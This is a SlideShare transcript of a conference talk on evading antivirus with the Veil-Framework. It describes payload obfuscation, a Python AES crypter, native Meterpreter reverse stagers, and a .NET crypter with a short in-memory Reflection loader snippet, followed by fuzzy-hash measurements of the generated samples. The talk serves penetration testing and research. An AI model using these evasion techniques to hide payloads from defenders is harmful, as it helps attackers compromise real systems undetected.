SlideShare a Scribd company logo
1 of 47
Download to read offline
Adventures in Asymmetric 
Warfare: 
Fighting the AV Vendors 
Will 
@harmj0y 
Veris Group - Adaptive Threat Division
@harmj0y 
● Security researcher and red teamer for the 
Adaptive Threat Division of Veris Group 
● Co-founder of the Veil-Framework #avlol 
o www.veil-framework.com 
o Shmoocon ‘14: AV Evasion with the Veil 
Framework 
o Defcon ‘14: Veil-Pillage: Post-exploitation 2.0 
o co-wrote Veil-Evasion, wrote Veil-Catapult, Veil- 
PowerView,Veil-Pillage, and PowerUp 
● Active Cortana and PowerShell hacker
tl;dr 
● Problem Space 
● How we got here and ethical issues 
● Approaches #avlol 
● Obfuscation methods 
● Payload Analysis
Teh Halting Problem? 
● Input: 
o a potentially malicious program P 
● Output: 
o True if executing P would cause a the host computer 
to be “compromised” 
o False otherwise 
● def halts(P): 
return 
isMalicious(“removeMaliciousLogic(P) 
compromiseHost()”)
Problem Space 
● Anti-virus detection is an undecidable 
problem 
o That is, it’s impossible to design a 100% effective 
anti-virus solution 
● Though a perfect approach is impossible, 
approximations can be made 
● But detection is really really hard
Our Problem
How We Got Here 
● From 2009 on, antivirus started snarfing up 
more and more stock MSF payloads 
● We started researching basic ways to keep 
doing our job 
● All of our initial efforts drew from prior 
work, we don’t claim to have invented 
any of this stuff!!
Previous Work 
● Mark Baggett’s post Tips for Evading Anti- 
Virus During Pen Testing was the first 
public resource to talk about using Python to 
inject shellcode 
● We ended up mostly drawing from Debasish 
Mandal's Execute ShellCode Using Python 
o Uses the 
VirtualAlloc/CreateThread/WaitForSingleObject 
pattern
Our Solution 
● A way to get around antivirus as easily as 
professional malware 
o don’t want to roll our own backdoor each time 
o codebase built by myself, @ChrisTruncer and 
@TheMightyShiv 
● Generate payloads in a language and 
technique agnostic way 
● See the Shmoocon ‘14 presentation AV 
Evasion with the Veil-Framework for more 
background
Our Solution
Ethical Issues 
● The disclosure debate is 
nothing new... 
● Pentesters are 5+ years 
behind the professional 
malware community 
● This is a problem the bad 
guys have already solved, 
and better than we have!
Public Reaction 
“surely this will just result in 21 new signatures for all major 
AVs and then we're back to square one?” 
“Isn't our entire field meant to be working towards 
increasing security, rather than handing out fully 
functioning weapons?” 
“The other point here is that anything that helps to expose 
how in-effective AV really is at stopping even a 
minimally sophisticated attacker is a good thing.” 
http://www.reddit.com/r/netsec/comments/1fc2xp/veil_a_metasploit_payloa 
d_generator_for_bypassing/
Twitter Reaction
Approaches 
● We started with Python based shellcode 
injection techniques, soon branched into 
other languages 
● Similar payloads = : ( 
o started implementing basic obfuscation methods 
o and by basic, we mean basic 
● static signatures = #avlol
Obfuscation 1.0 
● Let’s randomize everything we possibly can 
o This works better than you think 
● Substitute in a randomized string for all 
variable and method names 
● Shuffle up everything as appropriate
Obfuscation 1.0
“Pyherion” 
● What if vendors still find a way to trigger on 
the malicious Python script sources? 
● We introduced Pyherion, a python ‘crypter’ 
inspired by Hyperion 
● Encrypts an entire Python file with a random 
AES key, base64’s it and and rolls it all up 
into an exec(*) wrapper
Adventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
Obfuscation 1.5: Pure Stagers 
● What if vendors are triggering on the raw 
shellcode and decoders? 
● How about we eliminate shellcode all 
together, and build some native stagers? 
● They aren’t that complicated, thanks Raffi! 
o https://github.com/rsmudge/metasploit-loader 
o http://blog.strategiccyber.com/2013/06/28/staged-payloads- 
what-pen-testers-should-know/
Pure Stagers 
The meterpreter stager is surprisingly simple: 
1) a tcp connection is opened to the handler 
2) the handler spits back 4 bytes indicating 
the .dll size, and then the .dll itself 
3) socket number is pushed into EDI 
4) execution is passed to the .dll just like we 
do regular shellcode (void * or VirtualAlloc)
Pure Stagers 
● The following are the pure stagers currently 
available in the framework: 
Language Stager 
Python meterpreter/reverse_tcp 
Python meterpreter/reverse_http 
Python meterpreter/reverse_https 
C meterpreter/reverse_tcp 
C meterpreter/reverse_tcp_service 
C meterpreter/reverse_http 
C meterpreter/reverse_http_service
Pure Stagers 
Language Stager 
C# meterpreter/reverse_tcp 
C# meterpreter/reverse_http 
C# meterpreter/reverse_https 
Powershell meterpreter/reverse_tcp 
Powershell meterpreter/reverse_http 
Powershell meterpreter/reverse_https 
Ruby meterpreter/reverse_tcp
Obfuscation 2.0 
● Variable obfuscation is great 
● But for things like C, this doesn’t work as 
well as we’d like 
● Can we introduce something a little more 
interesting?
Obfuscation 2.0 
● Our (slightly) more “advanced” C obfuscation 
involves our interpretation of a method nop 
o muck up dynamic analysis without affecting the 
actual execution of the program 
● General idea: 
o throw in enough processing functions that sufficiently 
complicate the call tree of the program 
● This is a basic version of what malware has 
been doing for years 
o shouldn’t be that effective, but it is!
Obfuscation 2.0 
● Choose a set of randomized string processing 
functions (reverse, split, etc.) 
● Malloc a randomized number of strings of 
randomized lengths 
● Intersperse these randomized functions 
throughout the actual code
Obfuscation 2.0
Obfuscation 3.0 
● What if some vendors trigger on the 
Pyinstaller loader.exe itself? 
● How about a (reasonably) obfuscated version 
of the Pyinstaller loader? :) 
o BSides Boston ‘14: Pwnstaller 1.0 
o https://github.com/harmj0y/pwnstaller/ 
● Integrated into Veil-Evasion this past May
Pwnstaller 
● On each run: 
o Obfuscated code for all* source files associated with 
the Pyinstaller launcher are generated 
o mingw32 is used to compile everything into a new 
runw.exe, all on Kali m/ 
o copy the runw.exe into the correct location 
o a randomized Windows icon is chosen for the final 
packaged result 
*see http://www.harmj0y.net/blog/python/pwnstaller-1-0/ for a full 
explanation
Obfuscation 4.0: Ruby 
● Since some people have started to pay 
attention to Pyinstaller binaries, let’s try 
some other languages: 
● C? sure, with some obfuscation 
● C#? mono can help with .NET 
● PowerShell? no disk writes? awesome 
● Ruby? Why not...
Ruby 
● Ruby has a foreign function interface just like 
Python does, the win32-api gem 
o This means we can inject shellcode, and can write 
native Meterpreter stagers! 
● And it has its own Pyinstaller analogue: 
OCRA (One Click Ruby application) 
o http://ocra.rubyforge.org/ 
● I wonder if we can get this running on Kali :)
Ruby Shellcode Injection
Ruby OCRA Compilation
Ruby Module Releases 
● The following payload modules are currently 
in the development branch, and will be 
merged into master for the 9/15/2014 
V-Day: 
o ruby/shellcode_inject/flat 
o ruby/meterpreter/reverse_tcp 
● Everything is compiled to a self-extracting 
Windows executable, all on Kali!
A .NET Crypter 
● C#/VB.net code is compiled, not interpreted, 
so we can’t build a dynamic obfuscator 
equivalent to Pyherion :( 
● Or can we? .NET has an interesting feature 
called Reflection: 
o “you can use reflection to create type instances at 
run time, and to invoke and access them” 
http://msdn.microsoft.com/en-us/library/f7ykdhsy(v=vs.110).aspx
A .NET Crypter 
● If we have an array of raw bytes of a .NET 
binary, we can run the entire executable 
from memory with 3 lines by utilizing 
Reflection: 
o Assembly a = Assembly.Load(bytes); 
o MethodInfo m = a.EntryPoint; 
o m.Invoke(a.CreateInstance(m.Name), null); 
● We can obfuscate these bytes in any way we 
want beforehand
Arya: a .NET Crypter 
● A crypter for all .NET binaries was just 
pushed along with the Ruby payloads 
● A payload binary is generated and compiled 
as normal, the crypter then: 
o reads in the raw bytes 
o base64 encodes the data and builds a random 
substitution cipher for the string 
o builds a launcher/dropper that decodes the raw data 
and invokes the original binary using Reflection
A .NET Crypter
Payload Analysis
ssdeep 
● ssdeep is a ‘fuzzy hashing’ static malware 
comparison tool, allowing for the 
comparison of malware families 
● “can match inputs that have homologies” 
o biology term, fancy way to saying degree of shared 
ancestry 
● Generated 1000 samples of some payload 
families did ssdeep runs over each set
python/meterpreter/rev_tcp 
● (1000 choose 2) = 499500 possible pairing 
combinations for ssdeep 
● 169107 pairings (33.8%) matched at a score 
of 75/100 or better 
o Only 66 (.01%) scored at 90/100 or better 
o Average pairwise score: 74 
● What this means: only .01% of the samples 
scored as a ‘similar’ malware family
python/meterpreter/rev_tcp
c/meterpreter/rev_tcp 
● Same 499500 possible pairings 
● 267387 pairings (53.5%) matched at a score 
of 25/100 or better 
o Only 2615 (0.5%) scored at 90/100 or better 
o Average pairwise score: 37 
● What this means: only .5% of the samples 
scored as a ‘similar’ malware family 
o but wider variation than Python families
c/meterpreter/rev_tcp
cs/shellcode_inject/flat w/ Arya 
● Same 499500 possible pairings 
● Only 5 pairings (0.001%) matched at a 
score of 25/100 or better 
o none scored at 90/100 or better 
● What this means: 0% of the samples scored 
as a ‘similar’ malware family 
o variation was all over the map!
Recap 
● Started our research out of necessity but 
continued it out of curiosity 
● Fuxoring AV vendors really isn’t that 
difficult 
● There are still ways to stop us :) 
● #avlol
Questions? 
● Contact me: 
o @harmj0y 
o harmj0y@veil-framework.com 
● Read more: 
o https://www.veil-framework.com 
● Get the the goods: 
o https://www.github.com/Veil-Framework/Veil 
o https://github.com/HarmJ0y/stagers

More Related Content

What's hot

Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with PythonWill Schroeder
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Harness: PowerShell Weaponization Made Easy (or at least easier)
Harness: PowerShell Weaponization Made Easy (or at least easier)Harness: PowerShell Weaponization Made Easy (or at least easier)
Harness: PowerShell Weaponization Made Easy (or at least easier)RGKelley5
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkVeilFramework
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-PillageVeilFramework
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 

What's hot (20)

I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Harness: PowerShell Weaponization Made Easy (or at least easier)
Harness: PowerShell Weaponization Made Easy (or at least easier)Harness: PowerShell Weaponization Made Easy (or at least easier)
Harness: PowerShell Weaponization Made Easy (or at least easier)
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-Pillage
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 

Viewers also liked

I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)Will Schroeder
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conWill Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12Dr. Kenneth Gustin, Ph.D.
 
Asymmetric threat 4_paper (1)
Asymmetric threat 4_paper (1)Asymmetric threat 4_paper (1)
Asymmetric threat 4_paper (1)MarioEliseo3
 
Asymmetric threat 5_paper
Asymmetric threat 5_paperAsymmetric threat 5_paper
Asymmetric threat 5_paperMarioEliseo3
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have MissedWill Schroeder
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 

Viewers also liked (14)

I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12
Kenneth Gustin PhD Toffler Risk Round Table Event Tampa 2012 07 12
 
Asymmetric threat 4_paper (1)
Asymmetric threat 4_paper (1)Asymmetric threat 4_paper (1)
Asymmetric threat 4_paper (1)
 
Asymmetric threat 5_paper
Asymmetric threat 5_paperAsymmetric threat 5_paper
Asymmetric threat 5_paper
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have Missed
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a Boss
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 

Similar to Adventures in Asymmetric Warfare

The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level MalwareCTruncer
 
I just had to check ICQ project
I just had to check ICQ projectI just had to check ICQ project
I just had to check ICQ projectPVS-Studio
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Cysinfo Cyber Security Community
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
 
Mobile Weekend Budapest presentation
Mobile Weekend Budapest presentationMobile Weekend Budapest presentation
Mobile Weekend Budapest presentationPéter Ádám Wiesner
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodePVS-Studio
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Hacking the Codename One Source Code - Part I - Transcript.pdf
Hacking the Codename One Source Code - Part I - Transcript.pdfHacking the Codename One Source Code - Part I - Transcript.pdf
Hacking the Codename One Source Code - Part I - Transcript.pdfShaiAlmog1
 
How to reverse engineer Android applications—using a popular word game as an ...
How to reverse engineer Android applications—using a popular word game as an ...How to reverse engineer Android applications—using a popular word game as an ...
How to reverse engineer Android applications—using a popular word game as an ...Christoph Matthies
 
How to reverse engineer Android applications
How to reverse engineer Android applicationsHow to reverse engineer Android applications
How to reverse engineer Android applicationshubx
 
Creating a reasonable project boilerplate
Creating a reasonable project boilerplateCreating a reasonable project boilerplate
Creating a reasonable project boilerplateStanislav Petrov
 
Securing Rails
Securing RailsSecuring Rails
Securing RailsAlex Payne
 
Monitoring a program that monitors computer networks
Monitoring a program that monitors computer networksMonitoring a program that monitors computer networks
Monitoring a program that monitors computer networksPVS-Studio
 
Code quality par Simone Civetta
Code quality par Simone CivettaCode quality par Simone Civetta
Code quality par Simone CivettaCocoaHeads France
 
PVS-Studio and static code analysis technique
PVS-Studio and static code analysis techniquePVS-Studio and static code analysis technique
PVS-Studio and static code analysis techniqueAndrey Karpov
 
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...egypt
 
Open Source Security and ChatGPT-Published.pdf
Open Source Security and ChatGPT-Published.pdfOpen Source Security and ChatGPT-Published.pdf
Open Source Security and ChatGPT-Published.pdfJavier Perez
 

Similar to Adventures in Asymmetric Warfare (20)

The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level Malware
 
I just had to check ICQ project
I just had to check ICQ projectI just had to check ICQ project
I just had to check ICQ project
 
Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1Advanced malwareanalysis training session2 botnet analysis part1
Advanced malwareanalysis training session2 botnet analysis part1
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirus
 
Mobile Weekend Budapest presentation
Mobile Weekend Budapest presentationMobile Weekend Budapest presentation
Mobile Weekend Budapest presentation
 
Analysis of Godot Engine's Source Code
Analysis of Godot Engine's Source CodeAnalysis of Godot Engine's Source Code
Analysis of Godot Engine's Source Code
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Hacking the Codename One Source Code - Part I - Transcript.pdf
Hacking the Codename One Source Code - Part I - Transcript.pdfHacking the Codename One Source Code - Part I - Transcript.pdf
Hacking the Codename One Source Code - Part I - Transcript.pdf
 
How to reverse engineer Android applications—using a popular word game as an ...
How to reverse engineer Android applications—using a popular word game as an ...How to reverse engineer Android applications—using a popular word game as an ...
How to reverse engineer Android applications—using a popular word game as an ...
 
How to reverse engineer Android applications
How to reverse engineer Android applicationsHow to reverse engineer Android applications
How to reverse engineer Android applications
 
Creating a reasonable project boilerplate
Creating a reasonable project boilerplateCreating a reasonable project boilerplate
Creating a reasonable project boilerplate
 
Securing Rails
Securing RailsSecuring Rails
Securing Rails
 
Monitoring a program that monitors computer networks
Monitoring a program that monitors computer networksMonitoring a program that monitors computer networks
Monitoring a program that monitors computer networks
 
Code quality par Simone Civetta
Code quality par Simone CivettaCode quality par Simone Civetta
Code quality par Simone Civetta
 
PVS-Studio and static code analysis technique
PVS-Studio and static code analysis techniquePVS-Studio and static code analysis technique
PVS-Studio and static code analysis technique
 
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Expl...
 
Open Source Security and ChatGPT-Published.pdf
Open Source Security and ChatGPT-Published.pdfOpen Source Security and ChatGPT-Published.pdf
Open Source Security and ChatGPT-Published.pdf
 

More from Will Schroeder

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 

More from Will Schroeder (11)

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 

Recently uploaded

Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
